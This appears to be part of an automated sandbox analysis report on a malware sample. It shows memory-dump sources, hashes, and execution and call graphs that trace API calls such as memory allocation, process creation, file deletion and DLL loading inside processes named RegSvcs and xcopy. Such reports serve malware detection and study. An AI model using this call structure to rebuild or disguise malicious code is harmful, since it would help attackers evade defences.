                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: a3c76b321fe625e34ae97c51937be827b8170702acbd77fdb4843166c1dafa6d
                                                                                              • Instruction ID: ae32b505df6319a295b6e4a8b5b47fe71b944c21f86a3c0152919e91bbdfc818
                                                                                              • Opcode Fuzzy Hash: a3c76b321fe625e34ae97c51937be827b8170702acbd77fdb4843166c1dafa6d
                                                                                              • Instruction Fuzzy Hash: 3941FD31740203ABC761DE2ACC41FAABBE5FB98750F104619FDD5EB280DB25E8029BD1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 65d8f09bbe8dc48bd23c42c1c953c346b0480a352820ac331d72cd048302890a
                                                                                              • Instruction ID: f972a06de676fa4389a0cd1a814402e5a32f0b866157506920f20421d8b39047
                                                                                              • Opcode Fuzzy Hash: 65d8f09bbe8dc48bd23c42c1c953c346b0480a352820ac331d72cd048302890a
                                                                                              • Instruction Fuzzy Hash: 50318672A00219AFDF60DE2DDC50BEE77F8EB54610F458596E989E3240EB30DA449BA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction ID: 553860277fa63db38302bbca2a5a015d41daf9a16df06004f680005c9c274587
                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                              • Instruction Fuzzy Hash: 7F91C171E0423A9BEFA4DF6DC881ABEBBF5AF64320F14455AE9D5A72C0D73089408721
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: eb77e1320398b8514fe09fa61ddca7dc636f6deb2c25446ad8d8d96aaafebf47
                                                                                              • Instruction ID: 7419e2bbc65248ac412457204fa55ce27a417e36ff12945aa91cf081b31b4ab0
                                                                                              • Opcode Fuzzy Hash: eb77e1320398b8514fe09fa61ddca7dc636f6deb2c25446ad8d8d96aaafebf47
                                                                                              • Instruction Fuzzy Hash: 9D812AB1D002699BDB31DB54CC45BEEB7B8AF08750F0041EAEA59B7280D7759E84DFA0

                                                                                              Execution Graph

                                                                                              Execution Coverage:21.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 59 62863e7 60 62863ee socket 59->60 62 628649e 60->62

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
                                                                                              callgraph 0 Function_062C1BDF 1 Function_06260003 2 Function_06286225 3 Function_062AB527 4 Function_062C1732 5 Function_062863E7 5->2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 62863e7-62863ed 1 62863ee-62863fc 0->1 2 62863fd 1->2 3 6286425-6286429 1->3 2->3 4 62863ff-6286423 2->4 5 628642b-6286446 3->5 6 628647f-6286482 3->6 4->1 7 6286451-6286457 5->7 8 6286485-6286489 6->8 7->6 9 6286459-628647d 7->9 8->8 10 628648b-6286498 socket 8->10 9->7 12 628649e-62864a5 10->12 13 6286535-6286539 10->13 16 62864b0-62864b6 12->16 14 628653b-6286572 13->14 15 6286522 13->15 18 6286531-6286532 14->18 19 6286574-6286575 14->19 22 62864f6-62864fc 15->22 20 62864b8-62864dc 16->20 21 62864de-62864e2 16->21 18->13 20->16 24 6286524-628652d call 6286225 21->24 25 62864e4-62864eb 21->25 22->24 26 62864fe-6286520 22->26 24->18 25->22 26->15
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3915813020.0000000006260000.00000040.80000000.00040000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6260000_cJjnESPXORw.jbxd
                                                                                              Similarity
                                                                                              • API ID: socket
                                                                                              • String ID:
                                                                                              • API String ID: 98920635-0
                                                                                              • Opcode ID: dc6fce2622f2923c6de1ddfc756be3aea0b6c9f09f1082eb2a4cb621f16400db
                                                                                              • Instruction ID: cd40c8b153845c063d05f91fa49d3c1c406a0a5d568e463c31aab6c51ae30a24
                                                                                              • Opcode Fuzzy Hash: dc6fce2622f2923c6de1ddfc756be3aea0b6c9f09f1082eb2a4cb621f16400db
                                                                                              • Instruction Fuzzy Hash: A351AF71E25158DFCB59CF98D890AECBBF2BF89314F188099E815AB395C734A901CF54

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.4%
                                                                                              Dynamic/Decrypted Code Coverage:4.2%
                                                                                              Signature Coverage:1.6%
                                                                                              Total number of Nodes:450
                                                                                              Total number of Limit Nodes:74
                                                                                              execution_graph 100722 280b440 100724 280cab1 100722->100724 100725 282b200 100722->100725 100728 2829370 100725->100728 100727 282b22e 100727->100724 100729 2829401 100728->100729 100731 282939e 100728->100731 100730 2829417 NtAllocateVirtualMemory 100729->100730 100730->100727 100731->100727 100732 281ab80 100737 281a890 100732->100737 100734 281ab8d 100751 281a510 100734->100751 100736 281aba3 100738 281a8b5 100737->100738 100739 281aa00 100738->100739 100762 28231d0 100738->100762 100739->100734 100741 281aa17 100741->100734 100743 281aa0e 100743->100741 100746 281ab05 100743->100746 100777 2824cd0 100743->100777 100782 2819f60 100743->100782 100745 2824cd0 GetFileAttributesW 100745->100746 100746->100745 100748 281ab6a 100746->100748 100791 281a2d0 100746->100791 100795 282b280 100748->100795 100752 281a523 100751->100752 100755 281a52e 100751->100755 100753 282b360 RtlAllocateHeap 100752->100753 100753->100755 100754 281a552 100754->100736 100755->100754 100756 281a862 100755->100756 100759 2824cd0 GetFileAttributesW 100755->100759 100760 2819f60 RtlFreeHeap 100755->100760 100761 281a2d0 RtlFreeHeap 100755->100761 100757 281a878 100756->100757 100758 282b280 RtlFreeHeap 100756->100758 100757->100736 100758->100757 100759->100755 100760->100755 100761->100755 100763 28231de 100762->100763 100764 28231e5 100762->100764 100763->100743 100798 28143c0 100764->100798 100767 2823229 100773 28233d7 100767->100773 100802 282b360 100767->100802 100770 2823242 100771 28233cd 100770->100771 100770->100773 100774 282325e 100770->100774 100772 282b280 RtlFreeHeap 100771->100772 100771->100773 100772->100773 100773->100743 100774->100773 100775 282b280 RtlFreeHeap 100774->100775 100776 28233c1 100775->100776 100776->100743 100778 2824d35 100777->100778 100779 2824d6c 100778->100779 100809 2818200 100778->100809 100779->100743 100781 2824d4e 100781->100743 100783 2819f86 100782->100783 100813 281d990 100783->100813 100785 2819ff8 100787 281a17a 100785->100787 100788 281a016 100785->100788 100786 281a15f 100786->100743 100787->100786 100789 2819e20 RtlFreeHeap 100787->100789 100788->100786 100818 2819e20 100788->100818 100789->100787 100792 281a2f6 100791->100792 100793 281d990 RtlFreeHeap 100792->100793 100794 281a37d 100793->100794 100794->100746 100826 2829580 100795->100826 100797 281ab71 100797->100734 100799 28143e4 100798->100799 100800 2814420 LdrLoadDll 100799->100800 100801 28143eb 100799->100801 100800->100801 100801->100767 100805 2822ca0 LdrLoadDll 100801->100805 100806 2829530 100802->100806 100804 282b378 100804->100770 100805->100767 100807 282954d 100806->100807 100808 282955e RtlAllocateHeap 100807->100808 100808->100804 100810 28181b4 100809->100810 100811 28181d8 GetFileAttributesW 100810->100811 100812 28181e3 100810->100812 100811->100812 100812->100781 100815 281d9a2 100813->100815 100814 281d9be 100814->100785 100815->100814 100816 282b280 RtlFreeHeap 100815->100816 100817 281da01 100816->100817 100817->100785 100819 2819e3d 100818->100819 100822 281da10 100819->100822 100821 2819f43 100821->100788 100823 281da34 100822->100823 100824 281dade 100823->100824 100825 282b280 RtlFreeHeap 100823->100825 100824->100821 100825->100824 100827 282959d 100826->100827 100828 28295ae RtlFreeHeap 100827->100828 100828->100797 100829 2828680 100830 282870b 100829->100830 100832 28286ae 100829->100832 100834 3032ee0 LdrInitializeThunk 100830->100834 100831 282873c 100834->100831 100835 2828800 100836 282881d 100835->100836 100839 3032df0 LdrInitializeThunk 100836->100839 100837 2828845 100839->100837 100840 282c380 100841 282b280 RtlFreeHeap 100840->100841 100842 282c395 100841->100842 100843 2821940 100848 2821959 100843->100848 100844 28219ec 100845 28219a4 100846 282b280 RtlFreeHeap 100845->100846 100847 28219b4 100846->100847 100848->100844 100848->100845 100849 28219e7 100848->100849 100850 282b280 RtlFreeHeap 100849->100850 100850->100844 100851 2821141 100863 2829070 100851->100863 100853 2821162 100854 2821180 100853->100854 100855 2821195 100853->100855 100856 2829200 NtClose 100854->100856 100867 2829200 100855->100867 100858 2821189 100856->100858 100859 28211d5 100860 282119e 100860->100859 100861 282b280 RtlFreeHeap 100860->100861 100862 28211c9 100861->100862 100864 2829110 100863->100864 100866 282909b 100863->100866 100865 2829126 NtReadFile 100864->100865 100865->100853 100866->100853 100868 282921d 100867->100868 100869 282922e NtClose 100868->100869 100869->100860 100870 28218c9 100871 28218cf 100870->100871 100872 2829200 NtClose 100871->100872 100874 28218d4 100871->100874 100873 28218f9 100872->100873 100875 2809d90 100877 280a084 100875->100877 100878 280a39d 100877->100878 100879 282af10 100877->100879 100880 282af33 100879->100880 100885 2804070 100880->100885 100882 282af3f 100883 282af7b 100882->100883 100888 2825480 100882->100888 100883->100878 100892 28130e0 100885->100892 100887 280407d 100887->100882 100889 28254e2 100888->100889 100890 28254ef 100889->100890 100910 28118d0 100889->100910 100890->100883 100893 28130fa 100892->100893 100895 2813110 100893->100895 100896 2829c70 100893->100896 100895->100887 100897 2829c8a 100896->100897 100898 2829cb9 100897->100898 100903 2828850 100897->100903 100898->100895 100901 282b280 RtlFreeHeap 100902 2829d29 100901->100902 100902->100895 100904 282886d 100903->100904 100907 3032c0a 100904->100907 100905 2828899 100905->100901 100908 3032c11 100907->100908 100909 3032c1f LdrInitializeThunk 100907->100909 100908->100905 100909->100905 100911 281190b 100910->100911 100926 2817cd0 100911->100926 100913 2811913 100914 282b360 RtlAllocateHeap 100913->100914 100925 2811bd0 100913->100925 100915 2811929 100914->100915 100916 282b360 RtlAllocateHeap 100915->100916 100917 281193a 100916->100917 100918 282b360 RtlAllocateHeap 100917->100918 100920 281194b 100918->100920 100921 28119cd 100920->100921 100941 2816880 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100920->100941 100922 28143c0 LdrLoadDll 100921->100922 100923 2811b82 100922->100923 100937 2827dd0 100923->100937 100925->100890 100927 2817cfc 100926->100927 100942 2817bc0 100927->100942 100930 2817d34 100930->100913 100931 2817d29 100931->100930 100934 2829200 NtClose 100931->100934 100932 2817d5d 100932->100913 100933 2817d41 100933->100932 100935 2829200 NtClose 100933->100935 100934->100930 100936 2817d53 100935->100936 100936->100913 100938 2827e32 100937->100938 100940 2827e3f 100938->100940 100953 2811be0 100938->100953 100940->100925 100941->100921 100943 2817bd0 100942->100943 100947 2817cb6 100943->100947 100948 28288f0 100943->100948 100946 2829200 NtClose 100946->100947 100947->100931 100947->100933 100949 282890a 100948->100949 100952 30335c0 LdrInitializeThunk 100949->100952 100950 2817caa 100950->100946 100952->100950 100955 2811c00 100953->100955 100969 2817fa0 100953->100969 100956 2812153 100955->100956 100973 2820f80 100955->100973 100956->100940 100959 2811e17 100981 282c450 100959->100981 100960 2811c5e 100960->100956 100976 282c320 100960->100976 100963 2811e2c 100965 2811e79 100963->100965 100987 2810700 100963->100987 100965->100956 100967 2810700 LdrInitializeThunk 100965->100967 100991 2817f40 100965->100991 100966 2817f40 LdrInitializeThunk 100968 2811fc7 100966->100968 100967->100965 100968->100965 100968->100966 100970 2817fad 100969->100970 100971 2817fd5 100970->100971 100972 2817fce SetErrorMode 100970->100972 100971->100955 100972->100971 100974 282b200 NtAllocateVirtualMemory 100973->100974 100975 2820fa1 100974->100975 100975->100960 100977 282c330 100976->100977 100978 282c336 100976->100978 100977->100959 100979 282b360 RtlAllocateHeap 100978->100979 100980 282c35c 100979->100980 100980->100959 100982 282c3c0 100981->100982 100983 282c41d 100982->100983 100984 282b360 RtlAllocateHeap 100982->100984 100983->100963 100985 282c3fa 100984->100985 100986 282b280 RtlFreeHeap 100985->100986 100986->100983 100988 2810716 100987->100988 100995 2829490 100988->100995 100992 2817f53 100991->100992 101000 2828750 100992->101000 100994 2817f7e 100994->100965 100996 28294ad 100995->100996 100999 3032c70 LdrInitializeThunk 100996->100999 100997 281071f 100997->100968 100999->100997 101001 28287c7 101000->101001 101002 282877b 101000->101002 101005 3032dd0 LdrInitializeThunk 101001->101005 101002->100994 101003 28287ec 101003->100994 101005->101003 101006 2815a10 101007 2817f40 LdrInitializeThunk 101006->101007 101008 2815a40 101006->101008 101007->101008 101010 2815a6c 101008->101010 101011 2817ec0 101008->101011 101013 2817f04 101011->101013 101012 2817f25 101012->101008 101013->101012 101018 2828520 101013->101018 101015 2817f15 101016 2817f31 101015->101016 101017 2829200 NtClose 101015->101017 101016->101008 101017->101012 101019 2828596 101018->101019 101021 282854b 101018->101021 101023 3034650 LdrInitializeThunk 101019->101023 101020 28285bb 101020->101015 101021->101015 101023->101020 101024 2816f90 101025 2816fac 101024->101025 101028 2816fff 101024->101028 101027 2829200 NtClose 101025->101027 101025->101028 101026 2817134 101031 2816fc7 101027->101031 101028->101026 101035 28163b0 NtClose LdrInitializeThunk LdrInitializeThunk 101028->101035 101030 281710e 101030->101026 101036 2816580 NtClose LdrInitializeThunk LdrInitializeThunk 101030->101036 101034 28163b0 NtClose LdrInitializeThunk LdrInitializeThunk 101031->101034 101034->101028 101035->101030 101036->101026 101042 2828f10 101043 2828fc0 101042->101043 101045 2828f3f 101042->101045 101044 2828fd6 NtCreateFile 101043->101044 101046 3032ad0 LdrInitializeThunk 101047 281865b 101049 281866b 101047->101049 101048 281861b 101049->101048 101051 2816f10 101049->101051 101052 2816f26 101051->101052 101054 2816f5f 101051->101054 101052->101054 101055 2816d80 LdrLoadDll 101052->101055 101054->101048 101055->101054 101056 2816c61 101057 2816c22 101056->101057 101059 2816c3a 101056->101059 101060 2816c6c 101057->101060 101061 2817d70 101057->101061 101062 2817d8d 101061->101062 101068 2828940 101062->101068 101064 2817ddd 101065 2817de4 101064->101065 101073 2828a20 101064->101073 101065->101059 101067 2817e0d 101067->101059 101069 28289d4 101068->101069 101071 282896b 101068->101071 101078 3032f30 LdrInitializeThunk 101069->101078 101070 2828a0d 101070->101064 101071->101064 101074 2828ac9 101073->101074 101076 2828a4e 101073->101076 101079 3032d10 LdrInitializeThunk 101074->101079 101075 2828b0e 101075->101067 101076->101067 101078->101070 101079->101075 101080 281c420 101082 281c449 101080->101082 101081 281c54d 101082->101081 101083 281c4f3 FindFirstFileW 101082->101083 101083->101081 101085 281c50e 101083->101085 101084 281c534 FindNextFileW 101084->101085 101086 281c546 FindClose 101084->101086 101085->101084 101086->101081 101087 281f660 101088 281f6c4 101087->101088 101116 2816120 101088->101116 101090 281f7fe 101091 281f7f7 101091->101090 101123 2816230 101091->101123 101093 281f9a3 101094 281f87a 101094->101093 101095 281f9b2 101094->101095 101127 281f440 101094->101127 101096 2829200 NtClose 101095->101096 101098 281f9bc 101096->101098 101099 281f8b6 101099->101095 101100 281f8c1 101099->101100 101101 282b360 RtlAllocateHeap 101100->101101 101102 281f8ea 101101->101102 101103 281f8f3 101102->101103 101104 281f909 101102->101104 101105 2829200 NtClose 101103->101105 101136 281f330 CoInitialize 101104->101136 101107 281f8fd 101105->101107 101108 281f917 101139 2828ce0 101108->101139 101110 281f992 101111 2829200 NtClose 101110->101111 101112 281f99c 101111->101112 101113 282b280 RtlFreeHeap 101112->101113 101113->101093 101114 281f935 101114->101110 101115 2828ce0 LdrInitializeThunk 101114->101115 101115->101114 101118 2816153 101116->101118 101117 2816174 101117->101091 101118->101117 101143 2828d80 101118->101143 101120 2816197 101120->101117 101121 2829200 NtClose 101120->101121 101122 2816217 101121->101122 101122->101091 101124 2816255 101123->101124 101148 2828b70 101124->101148 101128 281f45c 101127->101128 101129 28143c0 LdrLoadDll 101128->101129 101131 281f47a 101129->101131 101130 281f483 101130->101099 101131->101130 101132 28143c0 LdrLoadDll 101131->101132 101133 281f54e 101132->101133 101134 28143c0 LdrLoadDll 101133->101134 101135 281f5ab 101133->101135 101134->101135 101135->101099 101138 281f395 101136->101138 101137 281f42b CoUninitialize 101137->101108 101138->101137 101140 2828cfa 101139->101140 101153 3032ba0 LdrInitializeThunk 101140->101153 101141 2828d2a 101141->101114 101144 2828d9d 101143->101144 101147 3032ca0 LdrInitializeThunk 101144->101147 101145 2828dc9 101145->101120 101147->101145 101149 2828b8a 101148->101149 101152 3032c60 LdrInitializeThunk 101149->101152 101150 28162c9 101150->101094 101152->101150 101153->101141 101154 281ff60 101155 281ff7d 101154->101155 101156 28143c0 LdrLoadDll 101155->101156 101157 281ff9b 101156->101157 101163 2812fe3 101164 2817bc0 2 API calls 101163->101164 101165 2812ff3 101164->101165 101166 2829200 NtClose 101165->101166 101167 281300f 101165->101167 101166->101167 101173 2829160 101174 28291d0 101173->101174 101176 282918b 101173->101176 101175 28291e6 NtDeleteFile 101174->101175 101179 2819a2c 101180 282b360 RtlAllocateHeap 101179->101180 101181 2819a3b 101180->101181 101182 2819a60 101181->101182 101183 282b280 RtlFreeHeap 101181->101183 101183->101182 101184 2809d30 101185 2809d3f 101184->101185 101186 2809d80 101185->101186 101187 2809d6d CreateThread 101185->101187 101188 2810c70 101189 2810c8a 101188->101189 101190 28143c0 LdrLoadDll 101189->101190 101191 2810ca8 101190->101191 101192 2810ced 101191->101192 101193 2810cdc PostThreadMessageW 101191->101193 101193->101192 101194 2817170 101195 2817188 101194->101195 101197 28171e2 101194->101197 101195->101197 101198 281b0b0 101195->101198 101199 281b0d6 101198->101199 101200 281b306 101199->101200 101225 2829610 101199->101225 101200->101197 101202 281b14c 101202->101200 101203 282c450 2 API calls 101202->101203 101204 281b168 101203->101204 101204->101200 101205 281b23f 101204->101205 101206 2828850 LdrInitializeThunk 101204->101206 101208 2815990 LdrInitializeThunk 101205->101208 101209 281b25e 101205->101209 101207 281b1ca 101206->101207 101207->101205 101211 281b1d3 101207->101211 101208->101209 101224 281b2ee 101209->101224 101232 28283c0 101209->101232 101210 281b227 101213 2817f40 LdrInitializeThunk 101210->101213 101211->101200 101211->101210 101212 281b205 101211->101212 101228 2815990 101211->101228 101247 2824600 LdrInitializeThunk 101212->101247 101218 281b235 101213->101218 101214 2817f40 LdrInitializeThunk 101219 281b2fc 101214->101219 101218->101197 101219->101197 101220 281b2c5 101237 2828470 101220->101237 101222 281b2df 101242 28285d0 101222->101242 101224->101214 101226 282962a 101225->101226 101227 282963b CreateProcessInternalW 101226->101227 101227->101202 101229 28159a2 101228->101229 101230 2828a20 LdrInitializeThunk 101229->101230 101231 28159cb 101230->101231 101231->101212 101233 2828436 101232->101233 101235 28283eb 101232->101235 101248 30339b0 LdrInitializeThunk 101233->101248 101234 282845b 101234->101220 101235->101220 101238 28284e6 101237->101238 101240 282849b 101237->101240 101249 3034340 LdrInitializeThunk 101238->101249 101239 282850b 101239->101222 101240->101222 101243 2828649 101242->101243 101245 28285fe 101242->101245 101250 3032fb0 LdrInitializeThunk 101243->101250 101244 282866e 101244->101224 101245->101224 101247->101210 101248->101234 101249->101239 101250->101244 101251 2825ef0 101252 2825f4a 101251->101252 101254 2825f57 101252->101254 101255 2823900 101252->101255 101256 282b200 NtAllocateVirtualMemory 101255->101256 101257 2823941 101256->101257 101258 28143c0 LdrLoadDll 101257->101258 101260 2823a4e 101257->101260 101261 2823987 101258->101261 101259 28239d0 Sleep 101259->101261 101260->101254 101261->101259 101261->101260 101263 28121f4 101264 2812195 101263->101264 101265 28121ff 101263->101265 101266 2828850 LdrInitializeThunk 101264->101266 101267 28121a6 101266->101267 101270 28292a0 101267->101270 101269 28121bb 101271 282932b 101270->101271 101272 28292ce 101270->101272 101275 3032e80 LdrInitializeThunk 101271->101275 101272->101269 101273 282935c 101273->101269 101275->101273 101276 281263a 101277 2812649 101276->101277 101278 2816120 2 API calls 101277->101278 101279 2812669 101277->101279 101278->101279
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(CB305BC4,?,?,?,?,?,?,?,?), ref: 0282914F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 18c2de097d6e05e9e2e73fb66ac8d9fe77a9c69f219f1cb552d884d3b4e729a8
                                                                                              • Instruction ID: 9b91965627ac709701b7e7512e50f7b89cc8f941308ad4c46af27c4639466f84
                                                                                              • Opcode Fuzzy Hash: 18c2de097d6e05e9e2e73fb66ac8d9fe77a9c69f219f1cb552d884d3b4e729a8
                                                                                              • Instruction Fuzzy Hash: FD31E8B9A00248AFDB14DF98D880EDFB7B9EF88714F108209FD18A7244D770A955CFA5
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(CB305BC4,?,02827E3F,00000000,00000004,00003000,?,?,?,?,?,02827E3F,02811C5E,?,?,0282B22E), ref: 02829434
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: 4d2451a9c57527e0122989cabbfb239a27f69cac0bf3d2dd571e81182f957e11
                                                                                              • Instruction ID: 15097c12ea4e532cbd01a37624b32e6a811be680d9750dc80c25dc3dd1940be7
                                                                                              • Opcode Fuzzy Hash: 4d2451a9c57527e0122989cabbfb239a27f69cac0bf3d2dd571e81182f957e11
                                                                                              • Instruction Fuzzy Hash: B62139B9A00248ABDB14DF98DC81EEFB7B9EF88714F008109FD08A7244D770A9558BA5
                                                                                              APIs
                                                                                              • NtDeleteFile.NTDLL(CB305BC4), ref: 028291EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 1caad6521f8bc669637c5c3099c0ef8c18523233f39a2b5e644aac288f79a86a
                                                                                              • Instruction ID: 73c0c8077ace039a2f8c9ca60909119b1d6fd007e20369c3eaf2668cbe1cbdd8
                                                                                              • Opcode Fuzzy Hash: 1caad6521f8bc669637c5c3099c0ef8c18523233f39a2b5e644aac288f79a86a
                                                                                              • Instruction Fuzzy Hash: 5D11C639A002187FD610EB98DC41FEFB76DDF85714F408149F918AB284D7B079458BB6
                                                                                              APIs
                                                                                              • NtClose.NTDLL(02821611,?,00000000,?,?,02821611,?), ref: 02829237
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction ID: ff33e7a1ef3294ea6e19da61ec2291eed125fd6ce8ba88005d5d54a0bfc15d6f
                                                                                              • Opcode Fuzzy Hash: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction Fuzzy Hash: 4BE08C3A2006187BD260EA5ECC40FEB77ADDFC5B24F418025FA0CA7241CA70B9058BF5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                              • Instruction ID: 8b458dd239f53c4911bdfc0e32cf51ca9153ebb6acbbd52a5ff7753fcc797b58
                                                                                              • Opcode Fuzzy Hash: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                              • Instruction Fuzzy Hash: 4790027160680412A140B1588884546404597E0301B55C421E0424554C8B558B665361
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                              • Instruction ID: 783185bea67080233d216911f4ffd9879333236556d71ff6cc2aa96015e9820f
                                                                                              • Opcode Fuzzy Hash: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                              • Instruction Fuzzy Hash: E89002A1602504425140B1588804406604597E1301395C525A0554560C87598A659369
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
                                                                                              • Instruction ID: 0c516a29f5ad72aa9556b9e6f96abe85018272895f768a50b51b3c0f18bb1082
                                                                                              • Opcode Fuzzy Hash: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
